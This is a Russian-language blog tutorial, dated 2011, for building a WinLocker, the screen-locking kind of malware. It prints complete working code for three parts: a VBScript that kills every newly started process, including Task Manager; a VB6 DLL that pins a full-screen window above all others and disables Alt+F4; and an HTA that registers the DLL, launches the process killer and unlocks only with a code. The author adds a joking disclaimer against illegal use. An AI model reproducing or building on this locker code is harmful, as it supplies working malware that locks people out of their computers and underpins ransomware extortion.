Страницы

воскресенье, 28 августа 2011 г.

Пишем WinLocker на VBScript и VB6.

В этой статье я расскажу, как написать простенький локер, что называется, на коленке.
Наш локер будет состоять из 3-х файлов:
1. VBS-скрипта для убийства процессов
2. Библиотеки для установки позиции окна HTML-приложения поверх всех окон
3. HTML-приложения для растяжки во весь экран
Не пытайтесь повторить это дома :)

Начнем с киллера процессов. Открываем блокнот. Я использую Notepad++. Пишем простенький код:
Set colMonitoredProcesses = GetObject("winmgmts:\\.\Root\CIMV2").ExecNotificationQuery( _
  "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")  
Do 
 Set objLatestProcess = colMonitoredProcesses.NextEvent  
 objLatestProcess.TargetInstance.Terminate()
Loop

Сохраняем с расширением VBS.
Скрипт каждую секунду мониторит появление процессов и убивает свежие. Можете попробовать запустить.
Предварительно рекомендую запустить диспетчер задач, для того, чтобы благополучно убить процесс wscript.exe. После запуска скрипта запустить диспетчер задач не получится. Становится понятно для чего он нам нужен :).

Продолжаем.
Зачем нам понадобилось писать библиотеку? Из VBS получить дескриптор окна не реально, а он нам очень нужен для того, чтобы установить позицию окна поверх всех окон, поэтому создадим так называемый Wrapper - библиотеку, которая поможет нам использовать API-функции из скрипта.

Для получения хэндла используем функцию FindWindow из библиотеки user32.dll, для установки позиции окна поверх всех - функцию SetWindowPos, а для запрета использования клавиатурного сочетания Alt+F4 - функцию RegisterHotKey из той же библиотеки.

Открываем IDE VB6, создаем проект ActiveX DLL, называем проект WinLocker, класс - WLClass, пишем несложный код:
Option Explicit
'API-функция получения дескриптора окна
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
        (ByVal lpszClassName As String, ByVal lpszWindow As String) As Long
'API-функция установки позиции окна
Private Declare Function SetWindowPos Lib "user32" _
        (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, _
        ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
'API-функция определения горячих кнопок
Private Declare Function RegisterHotKey Lib "user32" _
        (ByVal hWnd As Long, ByVal id As Long, ByVal fsModifiers As Long, _
        ByVal vk As Long) As Long
 
'получаем дескриптор
Public Function GetHandle(ByVal strCaption As String) As Long
    GetHandle = FindWindow(vbNullString, strCaption)
End Function
 
'устанавливаем окно поверх всех
Public Sub SetTop(ByVal strCaption As String)
   SetWindowPos FindWindow(vbNullString, strCaption), -1, 0, 0, 0, 0, 3
End Sub
 
'запрещаем использование Alt+F4
Public Sub DenyAltF4(ByVal strCaption As String)
   RegisterHotKey FindWindow(vbNullString, strCaption), 99, 1, &H73
End Sub

Комплируем DLL. Библиотека готова к использованию.

В завершение HTA. Открываем блокнот. Пишем код:
<html>
<head>
<title>VBSWinlocker</title>
<HTA:APPLICATION  
    SINGLEINSTANCE="yes"
 showInTaskbar ="no"
 BORDER="none"
 SCROLL="no" 
/>
<style type="text/css">
 body{
 color:#fff;
 font: bold sans-serif;
 }
    #center{
    position: absolute;
    left: 42%;
    top: 48%;
    }
 .button{
 font: bold;
 color:#fff;
 background-color:000055;   
 }
  </style>
</head>
<script language="VBScript">
 Const strDll = "WinLocker.dll" 'библиотека
 Const strWLProsMon = "WLProcKiller.vbs" 'киллер процессов
 Const strInputVal = "12345" 'код разблокировки
 
 'процедура изменения размера главного окна при загрузке
 Sub Window_OnLoad()
  'тащим окно в левый верхний угол
  Window.MoveTo 0, 0
  'растягиваем во весь экран
  Window.ResizeTo screen.availWidth, screen.availHeight
  'покажем код разблокировки
  code.innerhtml = "Код:" & strInputVal
  'чтобы при любом раскладе загрузился интерфейс
  Window.setTimeout "SetTopPos",1, "vbscript"   
 End Sub
 
 Sub SetTopPos() 
  Set wshShell = CreateObject("WScript.Shell")
  'пытаемся зарегистрировать библиотеку
  ret = wshShell.Run("regsvr32.exe /i /s  " & strDll & ",0,True")
  'проверяем успех регистрации
  If ret <> 0 Then 'если не удалось зарегистрировать
   wshShell.PopUp ,1,"Не удалось зарегистрировать библиотеку " & strDll ,16 
   Set wshShell = Nothing
   Window.Close
  End If
 
  'запускаем киллера процессов  
  ret = wshShell.Run("wscript.exe " & strWLProsMon)
  'проверяем успех запуска киллера
  If ret <> 0 Then 'если не удалось запустить скрипт мониторинга   
   wshShell.PopUp ,1,"Не удалось запустить " & strWLProsMon,16 
   Set wshShell = Nothing
   Window.Close
  End If
  Set wshShell = Nothing
 
  'создаем экземпляр класса из либы = strDll
  Set objDASetTop = CreateObject("WinLocker.WLClass")  
  'делаем окно поверх всех окон
  objDASetTop.SetTop document.title
  'запрещаем нажатие Alt+F4
  objDASetTop.DenyAltF4 document.title
  'удаляем ссылку
  Set objDASetTop = Nothing
 End Sub 
 
 'останавливаем киллера процессов
 Sub StopMon()  
  Dim objWMI, colProcess, objProcess
  Set objWMI = GetObject("winmgmts:\\.\Root\CIMV2")
  'ищем процесс мониторинга
  Set colProcess = objWMI.ExecQuery("Select * from Win32_Process Where Name ='wscript.exe' And CommandLine Like '%" & _
   strWLProsMon & "%'")
  For Each objProcess in colProcess 'побежали по полученным процессам 
   objProcess.Terminate 'убиваем процесс
  Next
  Set objWMI = Nothing 
 End Sub
 
 'проверка значения
 Sub CheckInputVal()
  If txtPW.Value = strInputVal Then
   StopMon 'останавливаем мониторинг процессов
   Window.Close 'закрываем приложение
  End If
 End Sub 
 
</script>
<!-- Рисуем нарядную градиентную заливку :) -->  
<body STYLE="filter:progid:DXImageTransform.Microsoft.Gradient (GradientType=1, StartColorStr='#000066', EndColorStr='#0000FF')">
 <div id="center"> 
  <input type="password" id="txtPW"> 
  <input type="button" class="button" value="ввод" onclick="CheckInputVal">
  <br/> 
  <div id="code"></div>
 </div>
</body> 
</html>

Не трудно догадаться, что:

SINGLEINSTANCE="yes" - запрещает одновременный запуск одноименных HTA
showInTaskbar="no" - запрещает отображение приложения в панели задач
BORDER="none" - убирает границу окна приложения
SCROLL="no" - убирает скролл

Сохраняем файл с расширением HTA. Наш локер готов. Запускаем...

p.s.: Не пытайтесь "допиливать" полученый код с целью противозаконного использования